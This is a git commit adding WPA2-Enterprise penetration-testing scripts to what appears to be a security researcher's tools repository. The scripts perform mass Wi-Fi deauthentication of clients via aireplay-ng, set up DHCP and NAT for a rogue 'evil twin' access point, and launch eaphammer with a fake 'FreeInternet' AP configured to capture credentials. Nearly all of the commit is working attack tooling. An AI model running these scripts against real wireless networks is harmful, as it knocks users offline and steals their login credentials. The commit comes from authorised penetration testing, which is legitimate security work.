Added couple of WPA2-Enterprise utilities.

This commit is contained in:
Mariusz B 2018-02-09 17:47:25 +01:00
parent d6c64c929d
commit cc5ba84532
6 changed files with 241 additions and 0 deletions

View File

@ -21,6 +21,8 @@
- **`smtpvrfy.py`** - SMTP VRFY python tool intended to check whether SMTP server is leaking usernames. ([gist](https://gist.github.com/mgeeky/1df141b18082b6f424df98fa6a630435))
- **`wpa2-enterprise-utils`** - Couple of scripts that became needed/useful during **WPA2-Enterprise** penetration-testing assignment.
- **`VLANHopperDTP.py`** - VLAN Hopping via DTP Trunk (Switch) Spoofing exploit - script automating full VLAN Hopping attack, from DTP detection to VLAN Hop with DHCP lease request ([gist](https://gist.github.com/mgeeky/7ff9bb1dcf8aa093d3a157b3c22432a0))
Sample output:

View File

@ -0,0 +1,12 @@
### WPA2-Enterprise penetration testing utilities
Here are several utilities that came handy during real-world **WPA2-Enterprise** penetration testing assignments centered round great [eaphammer](https://github.com/s0lst1c3/eaphammer.git) tool.
- **`config.txt`** - example of configuraion file for `massDeauth.sh` script.
- **`initDHCPServer.sh`** - This script set's up a DHCP server for Rouge AP / Evil Twin attack purposes, to make the victim actually reach out to the WAN. Nothing fancy, just set of needed commands. Especially handy when used with `startEAPHammer.sh` script.
- **`massDeauth.sh`** - Simple script intended to perform mass-deauthentication of any associated&authenticated client to the Access-Point. Helpful to actively speed up Rogue AP/Evil Twin attacks in multiple Access-Points within an ESSID environments. In other words, if you have an ESSID set up from many access-points (BSSIDs) - this script will help you deauthenitcate all clients from those APs iteratively.
- **`startEAPHammer.sh`** - This script launches `eaphammer` tool by s0lst1c3, available from: https://github.com/s0lst1c3/eaphammer.git . The tool is a great way to manage hostapd-wpe server as well as perform additional attacks around the concept. Although when used in penetration testing assignments, the tool may not be as reliable as believed due to various nuances with WLAN interface being blocked, not reloaded, DHCP-forced and so on. This is where this script comes in - it tries to automatize those steps before launching the tool and after. Especially handy when used with companion script called: `initDHCPServer.sh`

View File

@ -0,0 +1,14 @@
# Specify an interface
iface = wlp4s0
# Number of deauths
deauths = 3
# Retry deauths, 0 - infinity
retry = 3
# Here comes a list of APs to attack. The list entry form is following:
# target = <essid> <bssid> <channel>
target = test 00:11:22:33:44:55 14
target = test2 00:11:22:33:44:55 14
target = test3 00:11:22:33:44:55 14

View File

@ -0,0 +1,40 @@
#!/bin/bash
#
# This script set's up a DHCP server for Rouge AP / Evil Twin
# attack purposes, to make the victim actually reach out to the WAN.
#
# Nothing fancy, just set of needed commands. Especially handy when
# used with `startEAPHammer.sh` script.
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
#
if [ $# -ne 2 ]; then
echo "Usage: initDhcp.sh <inputIface> <outputIface>"
echo
echo -e "\tinputIface - Interface upon which DHCP leases should be offered."
echo -e "\toutputIfave - Interface offering access to WAN (default gateway)"
exit 1
fi
INP=$1
OUT=$2
ifconfig $INP up 10.0.0.1 netmask 255.255.255.0
sleep 2
if [ "$(ps -e | grep dhcpd)" == "" ]; then
echo "[+] Started DHCP server."
dhcpd $INP &
fi
# Enable NAT
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface $OUT -j MASQUERADE
iptables --append FORWARD --in-interface $INP -j ACCEPT
sysctl -w net.ipv4.ip_forward=1

View File

@ -0,0 +1,77 @@
#!/bin/bash
#
# Simple script intended to perform mass-deauthentication of
# any associated&authenticated client to the Access-Point.
# Helpful to actively speed up Rogue AP/Evil Twin attacks in
# multiple Access-Points within an ESSID environments.
#
# In other words, if you have an ESSID set up from many
# access-points (BSSIDs) - this script will help you
# deauthenitcate all clients from those APs iteratively.
#
# Expected config file must obey the following format:
# -----------------------------------------------
# # Specify an interface
# iface = wlp4s0
#
# # Number of deauths
# deauths = 3
#
# # Retry deauths, 0 - infinity
# retry = 3
#
# # Here comes a list of APs to attack. The list entry form is following:
# # target = <essid> <bssid> <channel>
# target = test 00:11:22:33:44:55 14
# target = test2 00:11:22:33:44:55 14
# target = test3 00:11:22:33:44:55 14
# -----------------------------------------------
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
#
if [ $# -ne 1 ]; then
echo "Usage: ./massDeauth <configFile>"
exit 1
fi
function deauthClients {
echo -e "\tDeauthing clients in AP: $essid / $bssid, $ch"
iface=$1
essid=$2
bssid=$3
ch=$4
deauths=$5
airmon-ng stop $iface @> /dev/null
echo -e "\t[1] Starting monitor on channel $ch"
airmon-ng start $iface $ch @> /dev/null
echo -e "\t[2] Deauthing $deauths number of times..."
aireplay-ng --deauth $deauths -a $essid $iface
}
config=$(cat $1 | grep -vE '^#')
retry=$(echo "$config" | grep retry | cut -d= -f2 | cut -d' ' -f2-)
deauths=$(echo "$config" | grep deauths | cut -d= -f2 | cut -d' ' -f2-)
iface=$(echo "$config" | grep iface | cut -d= -f2 | cut -d' ' -f2-)
echo "Using interface: $iface"
IFS=$'\n'
if [ $retry -eq 0 ]; then
retry=99999999
fi
for i in $(seq 0 $retry); do
echo -e "\n[$i] Deauthing clients..."
for line in $(echo "$config" | grep 'target' | cut -d= -f2 | cut -d' ' -f2-); do
essid=$(echo "$line" | awk '{print $1}')
bssid=$(echo "$line" | awk '{print $2}')
ch=$(echo "$line" | awk '{print $3}')
deauthClients $iface $essid $bssid $ch $deauths
done
done

View File

@ -0,0 +1,96 @@
#!/bin/bash
#
# This script launches `eaphammer` tool by s0lst1c3, available from:
# https://github.com/s0lst1c3/eaphammer.git
#
# The tool is a great way to manage hostapd-wpe server as well as perform
# additional attacks around the concept. Although when used in penetration
# testing assignments, the tool may not be as reliable as believed due to
# various nuances with WLAN interface being blocked, not reloaded,
# DHCP-forced and so on. This is where this script comes in - it tries to
# automatize those steps before launching the tool and after.
#
# Especially handy when used with companion script called:
# `initDHCPServer.sh`
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
#
####################################################################
# CONFIGURATION
# Name of offered Fake/Rouge AP
ESSID=FreeInternet
# MAC Address of Fake/Rouge AP
BSSID=24:01:c7:31:13:37
# Channel
CH=10
# Additional `eaphammer` options to pass.
EAPHAMMER_OPTS="--creds --wpa 2 --auth ttls"
# Wireless interface to use for Rogue/Fake AP purposes.
WLAN_IFACE=wlan0
# [optional] Outbound to WAN interface (default gateway) where to pass victim's
# internet connection. If not specified, there will be no IP forwarding set.
OUTBOUND_IFACE=
# Directory in which `eaphammer` has been installed/cloned.
EAPHAMMER_DIR=/root/tools/eaphammer
# [optional] Directory with this very script. Needed to find `initDHCPServer.sh` companion
# script. If not specified, will try to use this script's current working directory.
THIS_SCRIPT_DIR=/root/vmshared/wifiPentest
####################################################################
echo "[STEP 0]: Preliminary cleanup"
pkill dhclient
pkill dhcpd
echo "[STEP 1]: nl802111 driver Bug workaround"
nmcli radio wifi off
rfkill unblock wlan
echo "[STEP 2]: Reloading wireless interface"
ifconfig $WLAN_IFACE down
ifconfig $WLAN_IFACE up
sleep 2
echo "[STEP 3]: Reloading outbound interface."
if [ -n "$OUTBOUND_IFACE" ]; then
dhclient -r $OUTBOUND_IFACE
dhclient -v $OUTBOUND_IFACE 2>&1 | grep 'bound to'
else
echo "No outbound interface specified. Skipping step..."
fi
echo "[STEP 4]: Starting DHCP launch script in background"
if [ -n "$OUTBOUND_IFACE" ]; then
if [ -z "$THIS_SCRIPT_DIR" ]; then
THIS_SCRIPT_DIR="$( cd "$(dirname "{BASH_SOURCE[0]}" )" && pwd)"
fi
eval "$THIS_SCRIPT_DIR/initDHCPServer.sh $WLAN_IFACE $OUTBOUND_IFACE" &disown;
else
echo "No outbound interface specified. Skipping step..."
fi
pushd $EAPHAMMER_DIR > /dev/null
echo "[STEP 5]: Starting eaphammer with options: '$EAPHAMMER_OPTS'"
####################################################################
./eaphammer -i $WLAN_IFACE -e $ESSID -b $BSSID -c $CH $EAPHAMMER_OPTS
####################################################################
popd > /dev/null
echo "[STEP 6]: Killing services."
pkill dhclient
pkill dhcpd